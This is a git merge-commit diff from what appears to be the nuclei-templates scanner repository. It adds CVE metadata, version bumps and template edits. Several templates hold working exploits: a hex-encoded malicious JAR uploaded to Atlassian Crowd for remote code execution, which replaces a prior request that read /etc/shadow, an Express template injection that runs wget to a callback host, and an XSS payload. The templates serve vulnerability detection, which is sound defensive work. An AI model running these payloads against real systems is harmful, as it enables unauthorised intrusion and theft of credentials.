Merge branch 'main' into remediations

patch-1
Prince Chaddha 2023-09-11 12:02:51 +05:30 committed by GitHub
commit cf900022f5
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
231 changed files with 451 additions and 256 deletions

View File

@ -15,11 +15,16 @@ http/cves/2023/CVE-2023-32563.yaml
http/cves/2023/CVE-2023-34124.yaml http/cves/2023/CVE-2023-34124.yaml
http/cves/2023/CVE-2023-34192.yaml http/cves/2023/CVE-2023-34192.yaml
http/cves/2023/CVE-2023-36844.yaml http/cves/2023/CVE-2023-36844.yaml
http/cves/2023/CVE-2023-38433.yaml
http/cves/2023/CVE-2023-39361.yaml
http/cves/2023/CVE-2023-39600.yaml
http/cves/2023/CVE-2023-4634.yaml http/cves/2023/CVE-2023-4634.yaml
http/exposed-panels/aspcms-backend-panel.yaml http/exposed-panels/aspcms-backend-panel.yaml
http/exposed-panels/dxplanning-panel.yaml
http/exposed-panels/greenbone-panel.yaml http/exposed-panels/greenbone-panel.yaml
http/exposed-panels/jorani-panel.yaml http/exposed-panels/jorani-panel.yaml
http/exposed-panels/snapcomms-panel.yaml http/exposed-panels/snapcomms-panel.yaml
http/exposures/apis/seafile-api.yaml
http/miscellaneous/external-service-interaction.yaml http/miscellaneous/external-service-interaction.yaml
http/miscellaneous/rdap-whois.yaml http/miscellaneous/rdap-whois.yaml
http/misconfiguration/ecology-info-leak.yaml http/misconfiguration/ecology-info-leak.yaml
@ -29,6 +34,8 @@ http/misconfiguration/nacos/nacos-create-user.yaml
http/misconfiguration/php-debugbar-exposure.yaml http/misconfiguration/php-debugbar-exposure.yaml
http/osint/gist.yaml http/osint/gist.yaml
http/takeovers/lemlist-takeover.yaml http/takeovers/lemlist-takeover.yaml
http/technologies/burp-collaborator-detect.yaml
http/technologies/honeypot-detect.yaml
http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
http/technologies/wordpress/plugins/wp-seopress.yaml http/technologies/wordpress/plugins/wp-seopress.yaml
@ -37,7 +44,9 @@ http/vulnerabilities/hikvision/hikvision-fastjson-rce.yaml
http/vulnerabilities/hikvision/hikvision-ivms-file-upload-bypass.yaml http/vulnerabilities/hikvision/hikvision-ivms-file-upload-bypass.yaml
http/vulnerabilities/jorani/jorani-benjamin-xss.yaml http/vulnerabilities/jorani/jorani-benjamin-xss.yaml
http/vulnerabilities/other/huatian-oa8000-sqli.yaml http/vulnerabilities/other/huatian-oa8000-sqli.yaml
http/vulnerabilities/other/kingdee-erp-rce.yaml
http/vulnerabilities/other/landray-oa-datajson-rce.yaml http/vulnerabilities/other/landray-oa-datajson-rce.yaml
http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml
http/vulnerabilities/weaver/eoffice/weaver-eoffice-file-upload.yaml http/vulnerabilities/weaver/eoffice/weaver-eoffice-file-upload.yaml
ssl/c2/mythic-c2-ssl.yaml
workflows/kev-workflow.yaml workflows/kev-workflow.yaml

View File

@ -615,7 +615,7 @@
{"ID":"CVE-2019-11248","Info":{"Name":"Debug Endpoint pprof - Exposure Detection","Severity":"high","Description":"The debugging endpoint /debug/pprof is exposed over the unauthenticated Kubelet healthz port. This debugging endpoint can potentially leak sensitive information such as internal Kubelet memory addresses and configuration, or for limited denial of service. Versions prior to 1.15.0, 1.14.4, 1.13.8, and 1.12.10 are affected. The issue is of medium severity, but not exposed by the default configuration.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2019/CVE-2019-11248.yaml"} {"ID":"CVE-2019-11248","Info":{"Name":"Debug Endpoint pprof - Exposure Detection","Severity":"high","Description":"The debugging endpoint /debug/pprof is exposed over the unauthenticated Kubelet healthz port. This debugging endpoint can potentially leak sensitive information such as internal Kubelet memory addresses and configuration, or for limited denial of service. Versions prior to 1.15.0, 1.14.4, 1.13.8, and 1.12.10 are affected. The issue is of medium severity, but not exposed by the default configuration.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2019/CVE-2019-11248.yaml"}
{"ID":"CVE-2019-11370","Info":{"Name":"Carel pCOWeb \u003cB1.2.4 - Cross-Site Scripting","Severity":"medium","Description":"Carel pCOWeb prior to B1.2.4 is vulnerable to stored cross-site scripting, as demonstrated by the config/pw_snmp.html \"System contact\" field.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2019/CVE-2019-11370.yaml"} {"ID":"CVE-2019-11370","Info":{"Name":"Carel pCOWeb \u003cB1.2.4 - Cross-Site Scripting","Severity":"medium","Description":"Carel pCOWeb prior to B1.2.4 is vulnerable to stored cross-site scripting, as demonstrated by the config/pw_snmp.html \"System contact\" field.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2019/CVE-2019-11370.yaml"}
{"ID":"CVE-2019-11510","Info":{"Name":"Pulse Connect Secure SSL VPN Arbitrary File Read","Severity":"critical","Description":"Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 all contain an arbitrary file reading vulnerability that could allow unauthenticated remote attackers to send a specially crafted URI to gain improper access.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2019/CVE-2019-11510.yaml"} {"ID":"CVE-2019-11510","Info":{"Name":"Pulse Connect Secure SSL VPN Arbitrary File Read","Severity":"critical","Description":"Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 all contain an arbitrary file reading vulnerability that could allow unauthenticated remote attackers to send a specially crafted URI to gain improper access.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2019/CVE-2019-11510.yaml"}
{"ID":"CVE-2019-11580","Info":{"Name":"Atlassian Crowd and Crowd Data Center Unauthenticated Remote Code Execution","Severity":"critical","Description":"Atlassian Crowd and Crowd Data Center is susceptible to a remote code execution vulnerability because the pdkinstall development plugin is incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center. All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x),from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-11580.yaml"} {"ID":"CVE-2019-11580","Info":{"Name":"Atlassian Crowd and Crowd Data Center - Unauthenticated Remote Code Execution","Severity":"critical","Description":"Atlassian Crowd and Crowd Data Center is susceptible to a remote code execution vulnerability because the pdkinstall development plugin is incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center. All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x),from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-11580.yaml"}
{"ID":"CVE-2019-11581","Info":{"Name":"Atlassian Jira Server-Side Template Injection","Severity":"critical","Description":"Jira Server and Data Center is susceptible to a server-side template injection vulnerability via the ContactAdministrators and SendBulkMail actions. An attacker is able to remotely execute code on systems that run a vulnerable version of Jira Server or Data Center. All versions of Jira Server and Data Center from 4.4.0 before 7.6.14, from 7.7.0 before 7.13.5, from 8.0.0 before 8.0.3, from 8.1.0 before 8.1.2, and from 8.2.0 before 8.2.3 are affected by this vulnerability.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-11581.yaml"} {"ID":"CVE-2019-11581","Info":{"Name":"Atlassian Jira Server-Side Template Injection","Severity":"critical","Description":"Jira Server and Data Center is susceptible to a server-side template injection vulnerability via the ContactAdministrators and SendBulkMail actions. An attacker is able to remotely execute code on systems that run a vulnerable version of Jira Server or Data Center. All versions of Jira Server and Data Center from 4.4.0 before 7.6.14, from 7.7.0 before 7.13.5, from 8.0.0 before 8.0.3, from 8.1.0 before 8.1.2, and from 8.2.0 before 8.2.3 are affected by this vulnerability.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-11581.yaml"}
{"ID":"CVE-2019-11869","Info":{"Name":"WordPress Yuzo \u003c5.12.94 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Yuzo Related Posts plugin before 5.12.94 is vulnerable to cross-site scripting\nbecause it mistakenly expects that is_admin() verifies that the\nrequest comes from an admin user (it actually only verifies that the\nrequest is for an admin page). An unauthenticated attacker can consequently inject\na payload into the plugin settings, such as the\nyuzo_related_post_css_and_style setting.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-11869.yaml"} {"ID":"CVE-2019-11869","Info":{"Name":"WordPress Yuzo \u003c5.12.94 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Yuzo Related Posts plugin before 5.12.94 is vulnerable to cross-site scripting\nbecause it mistakenly expects that is_admin() verifies that the\nrequest comes from an admin user (it actually only verifies that the\nrequest is for an admin page). An unauthenticated attacker can consequently inject\na payload into the plugin settings, such as the\nyuzo_related_post_css_and_style setting.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-11869.yaml"}
{"ID":"CVE-2019-12276","Info":{"Name":"GrandNode 4.40 - Local File Inclusion","Severity":"high","Description":"GrandNode 4.40 is susceptible to local file inclusion in Controllers/LetsEncryptController.cs, which allows remote unauthenticated attackers to retrieve arbitrary files on the web server via specially crafted LetsEncrypt/Index?fileName= HTTP requests.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-12276.yaml"} {"ID":"CVE-2019-12276","Info":{"Name":"GrandNode 4.40 - Local File Inclusion","Severity":"high","Description":"GrandNode 4.40 is susceptible to local file inclusion in Controllers/LetsEncryptController.cs, which allows remote unauthenticated attackers to retrieve arbitrary files on the web server via specially crafted LetsEncrypt/Index?fileName= HTTP requests.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-12276.yaml"}
@ -2004,12 +2004,15 @@
{"ID":"CVE-2023-38035","Info":{"Name":"Ivanti Sentry - Authentication Bypass","Severity":"critical","Description":"A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38035.yaml"} {"ID":"CVE-2023-38035","Info":{"Name":"Ivanti Sentry - Authentication Bypass","Severity":"critical","Description":"A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38035.yaml"}
{"ID":"CVE-2023-38205","Info":{"Name":"Adobe ColdFusion - Access Control Bypass","Severity":"high","Description":"There is an access control bypass vulnerability in Adobe ColdFusion versions 2023 Update 2 and below, 2021 Update 8 and below and 2018 update 18 and below, which allows a remote attacker to bypass the ColdFusion mechanisms that restrict unauthenticated external access to ColdFusion's Administrator.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-38205.yaml"} {"ID":"CVE-2023-38205","Info":{"Name":"Adobe ColdFusion - Access Control Bypass","Severity":"high","Description":"There is an access control bypass vulnerability in Adobe ColdFusion versions 2023 Update 2 and below, 2021 Update 8 and below and 2018 update 18 and below, which allows a remote attacker to bypass the ColdFusion mechanisms that restrict unauthenticated external access to ColdFusion's Administrator.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-38205.yaml"}
{"ID":"CVE-2023-3836","Info":{"Name":"Dahua Smart Park Management - Arbitrary File Upload","Severity":"critical","Description":"Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3836.yaml"} {"ID":"CVE-2023-3836","Info":{"Name":"Dahua Smart Park Management - Arbitrary File Upload","Severity":"critical","Description":"Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3836.yaml"}
{"ID":"CVE-2023-38433","Info":{"Name":"Fujitsu IP Series - Hardcoded Credentials","Severity":"high","Description":"Fujitsu Real-time Video Transmission Gear “IP series” use hard-coded credentials, which may allow a remote unauthenticated attacker to initialize or reboot the products, and as a result, terminate the video transmission. The credentials cannot be changed by the end-user and provide administrative access to the devices.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-38433.yaml"}
{"ID":"CVE-2023-38646","Info":{"Name":"Metabase \u003c 0.46.6.1 - Remote Code Execution","Severity":"critical","Description":"Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38646.yaml"} {"ID":"CVE-2023-38646","Info":{"Name":"Metabase \u003c 0.46.6.1 - Remote Code Execution","Severity":"critical","Description":"Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38646.yaml"}
{"ID":"CVE-2023-39026","Info":{"Name":"FileMage Gateway - Directory Traversal","Severity":"high","Description":"Directory Traversal vulnerability in FileMage Gateway Windows Deployments v.1.10.8 and before allows a remote attacker to obtain sensitive information via a crafted request to the /mgmt/ component.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-39026.yaml"} {"ID":"CVE-2023-39026","Info":{"Name":"FileMage Gateway - Directory Traversal","Severity":"high","Description":"Directory Traversal vulnerability in FileMage Gateway Windows Deployments v.1.10.8 and before allows a remote attacker to obtain sensitive information via a crafted request to the /mgmt/ component.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-39026.yaml"}
{"ID":"CVE-2023-39120","Info":{"Name":"Nodogsplash - Directory Traversal","Severity":"high","Description":"Nodogsplash product was affected by a directory traversal vulnerability that also impacted the OpenWrt product. This vulnerability was addressed in Nodogsplash version 5.0.1. Exploiting this vulnerability, remote attackers could read arbitrary files from the target system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-39120.yaml"} {"ID":"CVE-2023-39120","Info":{"Name":"Nodogsplash - Directory Traversal","Severity":"high","Description":"Nodogsplash product was affected by a directory traversal vulnerability that also impacted the OpenWrt product. This vulnerability was addressed in Nodogsplash version 5.0.1. Exploiting this vulnerability, remote attackers could read arbitrary files from the target system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-39120.yaml"}
{"ID":"CVE-2023-39141","Info":{"Name":"Aria2 WebUI - Path traversal","Severity":"high","Description":"webui-aria2 commit 4fe2e was discovered to contain a path traversal vulnerability.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-39141.yaml"} {"ID":"CVE-2023-39141","Info":{"Name":"Aria2 WebUI - Path traversal","Severity":"high","Description":"webui-aria2 commit 4fe2e was discovered to contain a path traversal vulnerability.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-39141.yaml"}
{"ID":"CVE-2023-39143","Info":{"Name":"PaperCut \u003c 22.1.3 - Path Traversal","Severity":"critical","Description":"PaperCut NG and PaperCut MF before 22.1.3 are vulnerable to path traversal which enables attackers to read, delete, and upload arbitrary files.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-39143.yaml"} {"ID":"CVE-2023-39143","Info":{"Name":"PaperCut \u003c 22.1.3 - Path Traversal","Severity":"critical","Description":"PaperCut NG and PaperCut MF before 22.1.3 are vulnerable to path traversal which enables attackers to read, delete, and upload arbitrary files.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-39143.yaml"}
{"ID":"CVE-2023-3936","Info":{"Name":"Blog2Social \u003c 7.2.1 - Cross-Site Scripting","Severity":"medium","Description":"The Blog2Social WordPress plugin before 7.2.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3936.yaml"} {"ID":"CVE-2023-3936","Info":{"Name":"Blog2Social \u003c 7.2.1 - Cross-Site Scripting","Severity":"medium","Description":"The Blog2Social WordPress plugin before 7.2.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3936.yaml"}
{"ID":"CVE-2023-39361","Info":{"Name":"Cacti 1.2.24 - SQL Injection","Severity":"critical","Description":"Cacti is an open source operational monitoring and fault management framework. Affected versions are subject to a SQL injection discovered in graph_view.php. Since guest users can access graph_view.php without authentication by default, if guest users are being utilized in an enabled state, there could be the potential for significant damage. Attackers may exploit this vulnerability, and there may be possibilities for actions such as the usurpation of administrative privileges or remote code execution. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-39361.yaml"}
{"ID":"CVE-2023-39600","Info":{"Name":"IceWarp 11.4.6.0 - Cross-Site Scripting","Severity":"medium","Description":"IceWarp 11.4.6.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-39600.yaml"}
{"ID":"CVE-2023-4173","Info":{"Name":"mooSocial 3.1.8 - Reflected XSS","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in mooSocial mooStore 3.1.6. Affected is an unknown function of the file /search/index.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4173.yaml"} {"ID":"CVE-2023-4173","Info":{"Name":"mooSocial 3.1.8 - Reflected XSS","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in mooSocial mooStore 3.1.6. Affected is an unknown function of the file /search/index.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4173.yaml"}
{"ID":"CVE-2023-4174","Info":{"Name":"mooSocial 3.1.6 - Reflected Cross Site Scripting","Severity":"medium","Description":"A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4174.yaml"} {"ID":"CVE-2023-4174","Info":{"Name":"mooSocial 3.1.6 - Reflected Cross Site Scripting","Severity":"medium","Description":"A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4174.yaml"}
{"ID":"CVE-2023-4634","Info":{"Name":"Media Library Assistant \u003c 3.09 - Remote Code Execution/Local File Inclusion","Severity":"critical","Description":"A vulnerability in the Wordpress Media-Library-Assistant plugins in version \u003c 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-4634.yaml"} {"ID":"CVE-2023-4634","Info":{"Name":"Media Library Assistant \u003c 3.09 - Remote Code Execution/Local File Inclusion","Severity":"critical","Description":"A vulnerability in the Wordpress Media-Library-Assistant plugins in version \u003c 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-4634.yaml"}

View File

@ -1 +1 @@
bf4766f6ec2eca9601df9f6f4b11e620 d3d61b5b23048ba01c949efdf8b4fe02

View File

@ -1 +1 @@
6.2.0 6.2.1

View File

@ -1 +1 @@
3.1.3 3.1.4

View File

@ -1 +1 @@
7.2.0 7.2.1

View File

@ -1 +1 @@
5.0.8 5.0.9

View File

@ -1 +1 @@
16.5.1 16.6.0

View File

@ -1 +1 @@
5.7.1 5.7.2

View File

@ -1 +1 @@
2.1.8 2.2.0

View File

@ -1 +1 @@
9.4.4 9.4.5.1

View File

@ -1 +1 @@
1.0.122 1.0.201.1

View File

@ -1 +1 @@
5.9.6 N/A

View File

@ -1 +1 @@
6.3.2 6.4.1

View File

@ -1 +1 @@
4.13.1 4.13.2

View File

@ -1,7 +1,7 @@
id: CVE-2019-11580 id: CVE-2019-11580
info: info:
name: Atlassian Crowd and Crowd Data Center Unauthenticated Remote Code Execution name: Atlassian Crowd and Crowd Data Center - Unauthenticated Remote Code Execution
author: dwisiswant0 author: dwisiswant0
severity: critical severity: critical
description: Atlassian Crowd and Crowd Data Center is susceptible to a remote code execution vulnerability because the pdkinstall development plugin is incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center. All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x),from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability. description: Atlassian Crowd and Crowd Data Center is susceptible to a remote code execution vulnerability because the pdkinstall development plugin is incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center. All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x),from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.
@ -16,30 +16,40 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8 cvss-score: 9.8
cve-id: CVE-2019-11580 cve-id: CVE-2019-11580
epss-score: 0.97501
epss-percentile: 0.99963
cpe: cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:* cpe: cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:*
epss-score: 0.97491
metadata: metadata:
max-request: 1 max-request: 2
vendor: atlassian
product: crowd product: crowd
shodan-query: http.component:"Atlassian Jira" shodan-query: http.component:"Atlassian Jira"
tags: packetstorm,kev,cve,cve2019,atlassian,rce vendor: atlassian
tags: cve,cve2019,packetstorm,kev,atlassian,rce,intrusive,unauth
variables:
plugin: '{{hex_decode("504b0304140000000800033f2557544c2527eb0000000402000014001c0061746c61737369616e2d706c7567696e2e786d6c555409000316dff66410e4f66475780b000104e803000004e80300007d91416ec3201045d7ce29107b20c91a23e50039c4044f53140c16e0a8bd7d260527ae5595dd7c66febc0f1a8a879c1d0431f9f9ea02bbe177cf6d1ca51dbccc9fe8bdc4af89b30023f6fcb4b4b33304b862e2acce6571c7945d0c3d3f72669f5d7fd9981da3a3eb8c70e12356a5aa90606c8bde5c0314101643c124c87082e22e1eb9296946ad7e66561e03669bdc5488c46c61473269b85aad1bdfe32d8439c8bddc6bb594955afdc2de753a63ba7b2c0d99f2f9e80aaf4ff8aafe798beee93a272f2814c50b4691aed55aa93d6bd80bd8db106362505823caaa9128dab089d6e9e59290b5dafe37890f504b03040a0000000000033f255700000000000000000000000004001c00636f6d2f555409000316dff664bae3f66475780b000104e803000004e8030000504b03040a0000000000033f255700000000000000000000000008001c00636f6d2f63646c2f555409000316dff664bae3f66475780b000104e803000004e8030000504b03040a0000000000854225570000000000000000000000000e001c00636f6d2f63646c2f7368656c6c2f5554090003b9e4f664b9e4f66475780b000104e803000004e8030000504b0304140000000800bd422557a3de4c61670100004602000017001c00636f6d2f63646c2f7368656c6c2f6578702e636c617373555409000326e5f664b9e4f66475780b000104e803000004e80300008d51c94e0241107d25cb208c22e2bea05e0c18b1c1c4a8c17821b824440d183c237470cc3883330df25b5e347af003fc2863b5b870523be95a5ebfeaaa7efdfaf6fc02601bcb51849188611cc90826a298c4948169033384f09ee5586a9f1048676a8460d16d4a42bc6c39f2a4737329bdf3faa5cd48a8e91e4a45a8a4cbd7f56ebd277ce9756da9c495526d71c4a6da072af2b6237d55f893e6b75dc79705dd355aea35645b590c1898e5bcea76bc863cb074e788ecb537f465260c440ccc9998c70261b4582b653773f9dd6c3ebfb59333b06822852542a2e1de8846d316fe95b46dc1e584d4efd310929a202c571c9f7e0f4358fddf2308c32da92e3c4b498f309dce94bf6e3bf32ce7f3a030d064006669ef744098ec4b2becbad31255c59416ab831584f8f7f41a026909d80e73b6c89ed887d61e41f71cb06e6cc31fa0b631985ca2a969f601f6e6fa138608e38107047f2aa27c0ae6c5381ae128c8f828eff847cbb177504b03041400000008003a422557483e79dabf0000000f01000016001c00636f6d2f63646c2f7368656c6c2f6578702e6a617661555409000330e4f66430e4f66475780b000104e803000004e8030000558e416bc3300c85effe15a2a7642ca2290c36721c61eda9d0417bf61cd1787363d75293c0c87fafdbf5903d1008bdf73d14b4f9d14702e34f681a87dc92739552f6147c14f8d6bd1e9129f68e045b91804fd5dc44eb71b3ad474341acef12192e5fce1a304e33038d218d50d730ac13fdf9d704bf4a41d223db7bdb40e33f48b2596847e70bb140a4f333fcbb73f01d5332380769a31f18663fa472782825f0487288562866390eb7255bbcefeb62b52cdf8ab27c795d2ef2ea0e4c6a5257504b01021e03140000000800033f2557544c2527eb00000004020000140018000000000001000000fd810000000061746c61737369616e2d706c7567696e2e786d6c555405000316dff66475780b000104e803000004e8030000504b01021e030a0000000000033f2557000000000000000000000000040018000000000000001000fd4139010000636f6d2f555405000316dff66475780b000104e803000004e8030000504b01021e030a0000000000033f2557000000000000000000000000080018000000000000001000fd4177010000636f6d2f63646c2f555405000316dff66475780b000104e803000004e8030000504b01021e030a0000000000854225570000000000000000000000000e0018000000000000001000fd41b9010000636f6d2f63646c2f7368656c6c2f5554050003b9e4f66475780b000104e803000004e8030000504b01021e03140000000800bd422557a3de4c616701000046020000170018000000000000000000b48101020000636f6d2f63646c2f7368656c6c2f6578702e636c617373555405000326e5f66475780b000104e803000004e8030000504b01021e031400000008003a422557483e79dabf0000000f010000160018000000000001000000b481b9030000636f6d2f63646c2f7368656c6c2f6578702e6a617661555405000330e4f66475780b000104e803000004e8030000504b05060000000006000600ff010000c80400000000")}}'
http: http:
- method: GET - raw:
path: - |
- "{{BaseURL}}/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow" POST /crowd/admin/uploadplugin.action HTTP/2
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Content-Type: multipart/mixed; boundary=----------------------------f15fe87e95a7
Expect: 100-continue
------------------------------f15fe87e95a7
Content-Disposition: form-data; name="file_cdl"; filename="rce.jar"
Content-Type: application/octet-stream
{{plugin}}
------------------------------f15fe87e95a7--
- |
GET /crowd/plugins/servlet/exp HTTP/2
Host: {{Hostname}}
matchers-condition: and
matchers: matchers:
- type: word - type: word
part: body part: body_2
words: words:
- "root:*:" - "CVE-2019-11580"
- "bin:*:"
condition: and
- type: status
status:
- 200

View File

@ -39,6 +39,8 @@ http:
part: body part: body
words: words:
- "<svg/onload=alert(document.domain)>" - "<svg/onload=alert(document.domain)>"
- "<strong>IceWarp"
condition: and
- type: word - type: word
part: header part: header

View File

@ -33,6 +33,7 @@ http:
path: path:
- '{{BaseURL}}/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://{{interactsh-url}}%27);//' - '{{BaseURL}}/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://{{interactsh-url}}%27);//'
matchers-condition: and
matchers: matchers:
- type: word - type: word
